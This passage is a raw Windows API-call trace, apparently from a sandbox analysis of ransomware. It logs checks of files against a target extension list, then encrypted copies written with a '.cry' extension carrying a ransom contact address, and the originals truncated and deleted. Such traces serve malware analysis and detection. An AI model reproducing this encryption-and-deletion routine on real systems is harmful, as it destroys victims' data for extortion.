Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74 [0040.320] lstrlenW (lpString=".doc") returned 4 [0040.320] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0040.320] lstrlenW (lpString=".docx") returned 5 [0040.320] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0040.320] lstrlenW (lpString=".pdf") returned 4 [0040.320] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0040.320] lstrlenW (lpString=".xls") returned 4 [0040.320] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0040.320] lstrlenW (lpString=".xlsx") returned 5 [0040.320] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0040.320] lstrlenW (lpString=".ppt") returned 4 [0040.320] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0040.320] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74 [0040.320] lstrlenW (lpString=".zip") returned 4 [0040.320] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0040.320] lstrlenW (lpString=".rar") returned 4 [0040.320] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0040.320] lstrlenW (lpString=".bz2") returned 4 [0040.320] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0040.320] lstrlenW (lpString=".7z") returned 3 [0040.320] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0040.320] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74 [0040.320] lstrlenW (lpString=".dbf") returned 4 [0040.320] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0040.320] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74 [0040.320] lstrlenW (lpString=".1cd") returned 4 [0040.320] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0040.321] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74 [0040.321] lstrlenW (lpString=".jpg") returned 4 [0040.321] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0040.321] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74 [0040.321] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74 [0040.321] lstrlenW (lpString=".doc") returned 4 [0040.321] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0040.321] lstrlenW (lpString=".docx") returned 5 [0040.321] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0040.321] lstrlenW (lpString=".pdf") returned 4 [0040.321] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0040.321] lstrlenW (lpString=".xls") returned 4 [0040.321] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0040.321] lstrlenW (lpString=".xlsx") returned 5 [0040.321] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0040.321] lstrlenW (lpString=".ppt") returned 4 [0040.321] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0040.321] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74 [0040.321] lstrlenW (lpString=".zip") returned 4 [0040.321] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0040.321] lstrlenW (lpString=".rar") returned 4 [0040.321] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0040.322] lstrlenW (lpString=".bz2") returned 4 [0040.322] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0040.322] lstrlenW (lpString=".7z") returned 3 [0040.322] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0040.322] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74 [0040.322] lstrlenW (lpString=".dbf") returned 4 [0040.322] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0040.322] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74 [0040.322] lstrlenW (lpString=".1cd") returned 4 [0040.322] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0040.322] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74 [0040.322] lstrlenW (lpString=".jpg") returned 4 [0040.322] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0040.322] lstrcmpiW (lpString1=".msi", lpString2=".cry") returned 1 [0040.322] lstrlenW (lpString="Proof.msi") returned 9 [0040.322] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0040.610] GetFileSizeEx (in: hFile=0x1c4, lpFileSize=0x329ff1c | out: lpFileSize=0x329ff1c*=875520) returned 1 [0040.610] CloseHandle (hObject=0x1c4) returned 1 [0040.610] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi")) returned 0x2020 [0040.610] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0040.611] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0040.611] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.611] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.611] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0040.611] GetLastError () returned 0x0 [0040.611] ReadFile (in: hFile=0x1c4, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x329fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x329fed4*=0xd5c00, lpOverlapped=0x0) returned 1 [0041.146] WriteFile (in: hFile=0x1a4, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xd5c10, lpNumberOfBytesWritten=0x329fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x329fc9c*=0xd5c10, lpOverlapped=0x0) returned 1 [0041.159] ReadFile (in: hFile=0x1c4, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x329fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x329fed4*=0x0, lpOverlapped=0x0) returned 1 [0041.159] WriteFile (in: hFile=0x1a4, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x329fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x329fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0041.160] SetEndOfFile (hFile=0x1a4) returned 1 [0041.160] CloseHandle (hObject=0x1a4) returned 1 [0041.186] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.186] SetEndOfFile (hFile=0x1c4) returned 1 [0041.192] CloseHandle (hObject=0x1c4) returned 1 [0041.192] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0041.192] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi")) returned 1 [0041.193] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81 [0041.193] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81 [0041.193] lstrlenW (lpString=".doc") returned 4 [0041.193] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0041.193] lstrlenW (lpString=".docx") returned 5 [0041.193] lstrcmpiW (lpString1=".docx", lpString2="f.msi") returned -1 [0041.193] lstrlenW (lpString=".pdf") returned 4 [0041.193] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0041.193] lstrlenW (lpString=".xls") returned 4 [0041.193] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0041.193] lstrlenW (lpString=".xlsx") returned 5 [0041.193] lstrcmpiW (lpString1=".xlsx", lpString2="f.msi") returned -1 [0041.193] lstrlenW (lpString=".ppt") returned 4 [0041.193] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0041.193] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81 [0041.193] lstrlenW (lpString=".zip") returned 4 [0041.193] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0041.193] lstrlenW (lpString=".rar") returned 4 [0041.193] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0041.193] lstrlenW (lpString=".bz2") returned 4 [0041.193] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0041.193] lstrlenW (lpString=".7z") returned 3 [0041.193] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0041.193] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81 [0041.193] lstrlenW (lpString=".dbf") returned 4 [0041.193] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0041.193] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81 [0041.193] lstrlenW (lpString=".1cd") returned 4 [0041.193] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0041.193] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81 [0041.193] lstrlenW (lpString=".jpg") returned 4 [0041.193] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0041.193] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81 [0041.194] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81 [0041.194] lstrlenW (lpString=".doc") returned 4 [0041.194] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0041.194] lstrlenW (lpString=".docx") returned 5 [0041.194] lstrcmpiW (lpString1=".docx", lpString2="f.msi") returned -1 [0041.194] lstrlenW (lpString=".pdf") returned 4 [0041.194] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0041.194] lstrlenW (lpString=".xls") returned 4 [0041.194] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0041.194] lstrlenW (lpString=".xlsx") returned 5 [0041.194] lstrcmpiW (lpString1=".xlsx", lpString2="f.msi") returned -1 [0041.194] lstrlenW (lpString=".ppt") returned 4 [0041.194] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0041.194] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81 [0041.194] lstrlenW (lpString=".zip") returned 4 [0041.194] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0041.194] lstrlenW (lpString=".rar") returned 4 [0041.194] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0041.194] lstrlenW (lpString=".bz2") returned 4 [0041.194] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0041.194] lstrlenW (lpString=".7z") returned 3 [0041.194] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0041.194] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81 [0041.194] lstrlenW (lpString=".dbf") returned 4 [0041.194] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0041.194] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81 [0041.194] lstrlenW (lpString=".1cd") returned 4 [0041.194] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0041.194] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81 [0041.194] lstrlenW (lpString=".jpg") returned 4 [0041.194] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0041.194] lstrcmpiW (lpString1=".msi", lpString2=".cry") returned 1 [0041.195] lstrlenW (lpString="Proof.msi") returned 9 [0041.195] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0041.195] GetFileSizeEx (in: hFile=0x1c4, lpFileSize=0x329ff1c | out: lpFileSize=0x329ff1c*=881152) returned 1 [0041.195] CloseHandle (hObject=0x1c4) returned 1 [0041.195] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi")) returned 0x2020 [0041.195] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0041.195] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0041.195] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.195] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.195] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0041.195] GetLastError () returned 0x0 [0041.195] ReadFile (in: hFile=0x1c4, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x329fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x329fed4*=0xd7200, lpOverlapped=0x0) returned 1 [0041.314] WriteFile (in: hFile=0x1a4, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xd7210, lpNumberOfBytesWritten=0x329fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x329fc9c*=0xd7210, lpOverlapped=0x0) returned 1 [0041.330] ReadFile (in: hFile=0x1c4, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x329fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x329fed4*=0x0, lpOverlapped=0x0) returned 1 [0041.330] WriteFile (in: hFile=0x1a4, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x329fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x329fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0041.330] SetEndOfFile (hFile=0x1a4) returned 1 [0041.330] CloseHandle (hObject=0x1a4) returned 1 [0041.336] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.336] SetEndOfFile (hFile=0x1c4) returned 1 [0041.342] CloseHandle (hObject=0x1c4) returned 1 [0041.342] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0041.343] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi")) returned 1 [0041.343] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81 [0041.343] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81 [0041.343] lstrlenW (lpString=".doc") returned 4 [0041.343] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0041.343] lstrlenW (lpString=".docx") returned 5 [0041.343] lstrcmpiW (lpString1=".docx", lpString2="f.msi") returned -1 [0041.343] lstrlenW (lpString=".pdf") returned 4 [0041.343] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0041.343] lstrlenW (lpString=".xls") returned 4 [0041.343] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0041.343] lstrlenW (lpString=".xlsx") returned 5 [0041.343] lstrcmpiW (lpString1=".xlsx", lpString2="f.msi") returned -1 [0041.343] lstrlenW (lpString=".ppt") returned 4 [0041.343] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0041.343] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81 [0041.343] lstrlenW (lpString=".zip") returned 4 [0041.343] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0041.343] lstrlenW (lpString=".rar") returned 4 [0041.343] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0041.343] lstrlenW (lpString=".bz2") returned 4 [0041.343] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0041.343] lstrlenW (lpString=".7z") returned 3 [0041.343] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0041.343] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81 [0041.343] lstrlenW (lpString=".dbf") returned 4 [0041.343] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0041.343] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81 [0041.343] lstrlenW (lpString=".1cd") returned 4 [0041.344] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0041.344] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81 [0041.344] lstrlenW (lpString=".jpg") returned 4 [0041.344] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0041.344] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81 [0041.344] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81 [0041.344] lstrlenW (lpString=".doc") returned 4 [0041.344] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0041.344] lstrlenW (lpString=".docx") returned 5 [0041.344] lstrcmpiW (lpString1=".docx", lpString2="f.msi") returned -1 [0041.344] lstrlenW (lpString=".pdf") returned 4 [0041.344] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0041.344] lstrlenW (lpString=".xls") returned 4 [0041.344] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0041.344] lstrlenW (lpString=".xlsx") returned 5 [0041.344] lstrcmpiW (lpString1=".xlsx", lpString2="f.msi") returned -1 [0041.344] lstrlenW (lpString=".ppt") returned 4 [0041.344] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0041.344] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81 [0041.344] lstrlenW (lpString=".zip") returned 4 [0041.344] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0041.344] lstrlenW (lpString=".rar") returned 4 [0041.344] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0041.344] lstrlenW (lpString=".bz2") returned 4 [0041.344] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0041.344] lstrlenW (lpString=".7z") returned 3 [0041.344] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0041.344] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81 [0041.344] lstrlenW (lpString=".dbf") returned 4 [0041.344] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0041.344] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81 [0041.344] lstrlenW (lpString=".1cd") returned 4 [0041.344] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0041.344] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81 [0041.344] lstrlenW (lpString=".jpg") returned 4 [0041.344] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0041.345] lstrcmpiW (lpString1=".cab", lpString2=".cry") returned -1 [0041.345] lstrlenW (lpString="Proof.cab") returned 9 [0041.345] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0041.347] GetFileSizeEx (in: hFile=0x1c4, lpFileSize=0x329ff1c | out: lpFileSize=0x329ff1c*=21064532) returned 1 [0041.347] CloseHandle (hObject=0x1c4) returned 1 [0041.347] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab")) returned 0x2020 [0041.347] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0041.347] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab.id-9c354b42.[decryptoperator@qq.com].cry")) returned 1 [0042.059] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0042.059] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fc6c | out: lpNewFilePointer=0x0) returned 1 [0042.059] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fc2c | out: lpNewFilePointer=0x0) returned 1 [0042.059] ReadFile (in: hFile=0x1c4, lpBuffer=0x3d90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x329fc38, lpOverlapped=0x0 | out: lpBuffer=0x3d90058*, lpNumberOfBytesRead=0x329fc38*=0x40000, lpOverlapped=0x0) returned 1 [0042.379] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x6b23c6, lpNewFilePointer=0x0, dwMoveMethod=0x329fc2c | out: lpNewFilePointer=0x0) returned 1 [0042.379] ReadFile (in: hFile=0x1c4, lpBuffer=0x3dd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x329fc38, lpOverlapped=0x0 | out: lpBuffer=0x3dd0058*, lpNumberOfBytesRead=0x329fc38*=0x40000, lpOverlapped=0x0) returned 1 [0042.495] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x329fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0042.495] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x13d6b54, lpNewFilePointer=0x0, dwMoveMethod=0x329fc2c | out: lpNewFilePointer=0x0) returned 1 [0042.495] ReadFile (in: hFile=0x1c4, 